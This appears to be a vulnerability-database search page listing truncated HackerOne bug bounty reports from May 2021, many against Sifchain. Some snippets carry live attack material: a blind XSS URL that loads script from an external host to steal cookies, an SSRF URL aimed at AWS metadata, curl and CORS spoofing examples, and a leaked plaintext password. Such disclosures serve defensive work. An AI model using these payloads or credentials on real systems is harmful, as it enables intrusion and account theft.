Lucene search
+L
HackeroneRecent

15405 matches found

Hacker One
Hacker One
added 2021/05/11 7:38 p.m.33 views

GitLab: A deactivated user can access data through GraphQL

Summary A deactivated user should not be able to access information through the API. This rule is not enforced when making requests through the GraphQL endpoint. When reading through the changelog for 13.11.2 i noticed that the rule for a deactivated user allows for :login as it should but it is...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/11 2:23 p.m.51 views

Nextcloud: public webdav endpoint not bruteforce protected

Again related to https://hackerone.com/reports/1173684 I am having some trouble finding the code. However if you do curl -u "RANDOM1:RANDOM2" -X PROPFIND https://server/public.php/webdav And then check your ocbruteforceattempts table. You'll see there is no entry registered. Impact Low just like ...

5CVSS0.3AI score0.01702EPSS
SaveExploits0
Hacker One
Hacker One
added 2021/05/11 2:0 p.m.28 views

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure

ATTACK DETAILS Access-Control-Allow-Origin: https://sifchain.finance.evil.com Access-Control-Allow-Credentials: true Prefix origins are accepted www.example.com trusts example.com.evil.com Vulnerability Description CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/11 1:56 p.m.37 views

Nextcloud: Add to your nextcloud endpoint is not properly protected

This is related to https://hackerone.com/reports/1173684 The endpoint you hit does have bruteforce protection https://github.com/nextcloud/server/blob/master/apps/federatedfilesharing/lib/Controller/MountPublicLinkController.phpL126 But this is only triggered by finding a share that is password...

5CVSS0.01322EPSS
SaveExploits0
Hacker One
Hacker One
added 2021/05/11 12:57 p.m.33 views

Mail.ru: internal path disclosure via error message

Internal path in error message at activate.games.mail.ru...

2.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/10 11:50 p.m.291 views

Sifchain: Email Spoofing on sifchain.finance

Summary: There is an Email Spoofing vulnerability on your domain sifchain.finance which allows an attacker to send an email with your domain namesuch as [email protected] and so on. Steps To Reproduce: Go to http://emkei.cz Fill "From Email" field to [email protected] or any other...

6.7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/10 3:9 p.m.56 views

Sifchain: CSRF in newsletter form

Hi, i can perform csrf attack on victim on newsletter to receive updates because you dont have csrf protection "csrf token" in request Request: POST / HTTP/2 Host: sifchain.finance User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:88.0 Gecko/20100101 Firefox/88.0 Accept:...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/10 10:7 a.m.18 views

Vanilla: BlIND XSS on https://open.vanillaforums.com

Hello sir My name is Mohit Kumar and i'm a security researcher i found a bug in your website knows as Blind xss just open this link -- https://open.vanillaforums.com/search?Search=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fhackerookie.xss.ht%3E%3C%2Fscript%3E --- i will recieve your cookies and ip too...

0.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/09 12:53 p.m.16 views

Ruby: XMLRPC does not limit deserializable classes.

Vulnerability description not provided...

7.1AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/09 9:49 a.m.85 views

Evernote: Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion

Summary: The following endpoint was found to be vulnerable to SSRF : https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js The endpoint take a path in url and retrieve its content. it is supposed to be use on path but it can be used on URL to get access to intern...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/09 9:45 a.m.121 views

Sifchain: Cross Origin Resource Sharing Misconfiguration | Lead to sensitive information.

hii team, i found a cors bug in your https://sifchain.finance/ website . Steps To Reproduce: 1. goto https://sifchain.finance/ website and enter email and click signup. 2. intercept via burp ,you will get a request . send to repeater. 3.change the request as POST /==wp-json== HTTP/2 Host:...

6.6AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/09 4:50 a.m.81 views

Sifchain: Social media links not working

Summary: Hey team when i research i found business Logic issue and i will explain to you Steps To Reproduce: POC:- 1. Goto https://sifchain.finance/ 2.Try to add anything after https://sifchain.finance/ 3. Now you will show 404 page not found. 4. Look below in the page you will show links of soci...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/08 7:53 p.m.27 views

Nextcloud: End to end encryption folder locking is not properly protected

I do not see the endtoendencryption app listed here. But since you advertise it big on your website and in communication. And the clients that also support it are covered I assume this is part of the program as well. 1. userA has end to end encryption setup 2. userB wants to annoy userA 3. userB...

4CVSS0.00722EPSS
SaveExploits1
Hacker One
Hacker One
added 2021/05/08 7:36 p.m.33 views

Nextcloud: Android app does not clear end to end encryption keys

userA on serverA sets up end to end encryption on their android device 2. userA has some end to end encrypted data 3. userA removes their account on serverA from their android device for whatever reason 4. attacker evil admin obtains the device of userA 5. attacker evil admin logs in on the...

2.1CVSS3.2AI score0.00303EPSS
SaveExploits1
Hacker One
Hacker One
added 2021/05/08 7:22 p.m.23 views

Nextcloud: End to end encryption public key is not properly verified on Desktop and Android

Since last time when I reported something on multiple platforms you seems to prefer handling it in 1 spot. I now just do one. Let me know if You want me to fill separate for android as well. This issue does not seem to happen on iOS as there a test string is encrypted and decrypted, in short...

6.7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/08 12:50 p.m.126 views

Sifchain: Information disclosure on Sifchain

Summary: Hello Team, I have found user/admin usernames disclosed. Using REST API, we can see all the WordPress users/authors with some of their information. such as id, name, login name, etc. and employees of Sifchain without authentication on https://sifchain.finance/ Steps To Reproduce: You can...

6.5AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/08 12:9 p.m.118 views

Sifchain: Found key_adress and key_password in GitHub history

Summary: I found in your GitHub history keyadress and keypasswords Steps To Reproduce: 1. Open url https://github.com/Sifchain/sifnode/commit/f21dcf05c7953693b82bba119bba5ca48982b6d0diff-3b3ced8ca40f67dd52fd8031d9c2b5147c249a8c66b3aa066e355c0ee12fa14c 2. search for "keypassword" and you will find...

6.7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/08 10:25 a.m.20 views

Sifchain: Sifchain token leak

Hi Tim sifchain token leak 1=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-devnet.json 2=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-testnet.json...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/08 12:31 a.m.27 views

Sifchain: No Valid SPF Records at sifchain.finance

Hello, There is any issue No valid SPF Records Desciprition : There is a email spoofing vulnerability.Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing is a tactic used in phishing...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 10:5 p.m.20 views

Sifchain: CORS Misconfiguration Leads to Sensitive Exposure on Sifchain main domain

Summary: Hello, I know that isn't in the Scope But this The Only Way I can Report With And It Belongs to the Main Domain. ==At first please see all those references given below:== References: https://hackerone.com/reports/768151 https://hackerone.com/reports/1167869...

7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 9:22 p.m.25 views

Sifchain: Username disclosure at Main Domain

Hello, PoC Link https://sifchain.finance//wp-json/wp/v2/users/ thanks. Impact Malicious counterpart could collect the usernames disclosed and the admin user and be focused throughout BF attack as the usernames are now known, making it less harder to penetrate the data.gov systems...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 9:7 p.m.16 views

Sifchain: Design Issues at Main Domain

Hello i found design issue at sifchain.finance When we go to this website https://sifchain.finance/hello%20sifchain We get 404 so its normal but if you look at the bottom side of web page you can see the redirects will be broken. F1293150 Impact Content Spoofing...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 8:48 p.m.204 views

Sifchain: Vulnerable javascript dependency at Main domain

Hello, Issue detail, Burp observed 1 outdated JavaScript libraries with 4 known vulnerabilities. Burp detected bootstrap version 4.0.0, which has the following vulnerabilities: CVE-2019-8331: XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2018-14041: XSS in...

4.3CVSS6.2AI score0.16404EPSS
SaveExploits5
Hacker One
Hacker One
added 2021/05/07 8:41 p.m.124 views

Sifchain: Vulnerable for clickjacking attack

Summary: Hii Team, I know that I have reported to you outside of Scope. The report is related to the mentioned company and the vulnerability can endanger your business so I report this vulnerability to you. Clickjacking User Interface redress attack, UI redress attack, UI redressing is a maliciou...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 8:30 p.m.24 views

Sifchain: Linux Desktop application "sifnoded" executable does not use Pie / no ASLR

Hello Sifchain, sifnoded binary from the Linux application is no position independent executable PoC; $file sifnoded Output will be like ; ███████ Position independent executables are required for full ASLR support on Linux. Non-pie-binaries are loaded to a fixed location, thus allowing ROP...

8.4AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 8:20 p.m.90 views

Sifchain: Wrong Url in Main Page

Hello, There is no linkedin account belonging to the url you added to your homepage and this link can be easily captured by someone else. Misunderstandings may occur. F1293094 https://www.linkedin.com/company/kns-group/about/ Impact Broken Link Hijack...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 7:37 p.m.34 views

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure -Any website can issue requests made with user credentials and read the responses to th

Welcome! ==In this report I want to describe a high-level bug that can seriously put a user account at risk.== CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side cross-origin requests. This application is using CORS in an insecure way. The web application fails to proper...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 7:1 p.m.118 views

Sifchain: A password in plain text in conf file

I found a password in plain text in \sifnode-develop\ui\e2e\config.js in the source code. password: "coolguy21" Impact I don't know actually how does this affects but passwords in plaintexts are always dangerous...

7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 5:14 p.m.64 views

Internet Bug Bounty: "urllib" will result to deny of service

if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument. maybe this client also will consume more and more memory. i does not test on this conclusion. client.py import urllib.request req =...

7.1CVSS7.8AI score0.11994EPSS
SaveExploits1
Hacker One
Hacker One
added 2021/05/07 2:35 p.m.27 views

Revive Adserver: Reflected XSS on /admin/stats.php

Hi, Security Team! Linked to the reports: - https://hackerone.com/reports/1083376 - https://hackerone.com/reports/1097217 In the past reports, we have corrected Reflected XSS. But recently it turned out that with the parameter breakdown = affiliates, this vulnerability still works. Fixed when...

4.3CVSS1.3AI score0.02714EPSS
SaveExploits1
Hacker One
Hacker One
added 2021/05/07 2:31 p.m.23 views

Sifchain: Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.

Summary: Hello, I've found a Dependency Confusion vulnerability in the sifnode project. The vulnerability allows me to claim previously unclaimed npm packages that are being used by the sifnode project, and serve malicious content in them which would allow me to gain remote code execution on anyo...

8.2AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 8:18 a.m.865 views

Sifchain: CORS misconfiguration

Description: Affected website: https://sifchain.finance/wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml Step-by-step Reproduction : 1. Send this request: javascript GET /wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml HTTP/1.1 Host: sifchain.finance...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 6:14 a.m.83 views

Sifchain: Email spoofing

Email spoofing is possible To verify: visit :https://www.kitterman.com/spf/validate.html? and type your domain name to check SPF record you can see the results as: NO valid SPF record found POC: 1.visit http://emkei.cz// 2.fill the from email as [email protected] 3.to email as victim email...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 4:58 a.m.25 views

Ruby: RCE by parsing `.rdoc_options` in RDoc

The Ruby RDoc library was vulnerable to remote code execution due to improper parsing of the .rdocoptions configuration file. When the RDoc command was executed, the library attempted to load the YAML-formatted .rdocoptions file, which allowed for the instantiation of arbitrary classes and the...

4.5CVSS8AI score0.01571EPSS
SaveExploits0
Hacker One
Hacker One
added 2021/05/07 1:45 a.m.17 views

Ruby: XSS in HTML generated by RDoc

Vulnerability description not provided...

7.1AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 7:48 p.m.276 views

Sifchain: wrong url in hackerone > goes to wix.com > unconnected

Summary: Hi there, this is a very small issue out of scope. Your current domain name in your hackerone program is wrong: http://sifchain.finance and moves to wix.com Steps To Reproduce: 1. Login as a researcher 2. Open the program from sifchain: https://hackerone.com/sifchain?type=team 3. click o...

6.6AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 7:23 p.m.71 views

Reddit: critical file found etc/passwd on www.reddit.com

1.go to this link https://www.reddit.com/etc%2fpasswd 2.youll find all the etc/passwd files this data should be protected. 3.these passwd can be used for many illegal purpose and can damage the comapny poc attched: HTTP/2 200 OK Content-Type: text/plain; charset=UTF-8 X-Ua-Compatible: IE=edge...

7.2AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 7:21 p.m.20 views

Sifchain: No valid SPF record found

Email spoofing is possible To verify: visit : https://www.kitterman.com/spf/validate.html and type your domain name to check SPF records you can see the results as: No valid SPF record found. POC: 1. visit: https://emkei.cz/ 2. fill the from email as [email protected] 3.To email as victim ema...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 6:53 p.m.360 views

Sifchain: Possibility of DoS attack at https://sifchain.finance// via CVE-2018-6389 exploitation

There is possibility in /wp-admin/load-scripts.php script to generate large 3Mb amount of data via simple non-authenticated request to server. The vulnerability is registered as https://vulners.com/cve/CVE-2018-6389 Details Detailed attack scenario is described for example here:...

5CVSS7.4AI score0.72671EPSS
SaveExploits12
Hacker One
Hacker One
added 2021/05/06 5:23 p.m.14 views

Sifchain: Flaws In Social media Icon on error page which can lead to financial loss to a company.

Here, i found an issue on sifchain.finance that will direct impact to the customer of sifchain company which can be great loss in business as well as there will be problem regarding to communication with the genuine customer of a company. I know that sifchain.finance is not in scope but i saw thi...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 4:58 p.m.96 views

Sifchain: Open S3 Bucket | information leakage

Hi I found an Open S3 Bucket. - POC : aws s3 ls s3://amazon-eks/ Source : https://github.com/Sifchain/sifnode/blob/bebbe9883560bbde4f452f81a2d85bdbc243636a/deploy/rake/dependencies.rake21 regards oos Impact information leakage...

6.9AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 4:8 p.m.25 views

Sifchain: Misconfiguration Certificate Authority Authorization Rule

Hello,Sifchain Security Team, I found a bug called Missing CAA. Certificate Authority Authorization supported by LetsEncrypt and other CAs allows a domain owner to specify which Certificate Authorities should be allowed to issue certificates for the domain. All CAA-compliant certificate authoriti...

6.5AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 3:1 p.m.81 views

MCUboot: DMARC and DNS Records not found on mcuboot.com

Found no DMARC and DNS record on mcuboot.com . I am also able to send an email to me on your behalf . The mail sent didnot even landed in spam folder which could make the users believe on the attacker as a legitimate person or authority. Any attacker could do so by using any fake mailer .For exmp...

6.7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 11:3 a.m.93 views

Sifchain: Clickjacking Vulnerability in sifchain.finance

Hello team - Greetings! Hope you are fine. sifchain.finance website is vulnerable to Clickjacking. NOT ONLY THE HOME PAGE IS VULNERABLE, ALL THE PAGES IN THE WEBSITE IS VULNERABLE TO CLICKJACKING. And it has to be fixed because, Clickjacking is an attack that tricks the user to click a webpage...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 9:36 a.m.17 views

Sifchain: No Rate Limit in email leads to huge Mass mailings

steps to reproduce: 1.go to https://medium.com/sifchain-finance, click sign in. 2.click sign in with email,enter email and click continue 3.intercept the request in burp, POST /m/account/authenticate-email HTTP/2 Host: medium.com Cookie: optimizelyEndUserId=lo4bda3b4cea4e;...

6.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/06 4:27 a.m.79 views

CS Money: Previously created sessions continue being valid after MFA activation

Summary: Hi, team. This is the same issue of 667739. Please take a look. I found one issue related to your 2FA system on https://cs.money/security/ Steps To Reproduce: 1. access the same account on https://cs.money/ in two devices 1. on device 'A' go to https://cs.money/security/ complete all ste...

1.1AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/05 4:15 p.m.92 views

Kaspersky: Several domains on kaspersky.com are vulnerable to Web Cache Deception attack

Reported security issue allowed a potential attacker to steal potentially sensitive information of users of a website, because multiple subdomains of the Kaspersky domain were vulnerable to web cache deception attack. In this scenario the user needs to open a phishing link in a web browser. The...

3.8AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/05 11:9 a.m.21 views

U.S. Dept Of Defense: [www.███] Reflected Cross-Site Scripting

Description: Good morning, there's a reflected cross-site scripting vulnerability on https://www.██████████/█████ There was some difficult in making a payload for this vulnerability, mainly due to the WAF blocking some vectors; But exploitation is still possible. Here's a proof of concept showing...

0.7AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/04 11:26 p.m.19 views

Brave Software: XSS on Brave Today through custom RSS feed

A vulnerability was discovered in Brave iOS's custom RSS feed feature that allowed for cross-site scripting XSS attacks. Attackers could add a malicious RSS feed containing a javascript: URL, which could execute arbitrary code when a user clicked on a link in Brave Today. The vulnerability was...

6.4AI score
SaveExploits0
Hacker One
Hacker One
added 2021/05/04 8:21 p.m.147 views

GitHub Security Lab: [JAVA]: CWE-347 - Improper Verification of Cryptographic Signature : Potential for Auth Bypass

This bug was reported directly to GitHub Security Lab...

2.2AI score
SaveExploits0
Total number of security vulnerabilities15405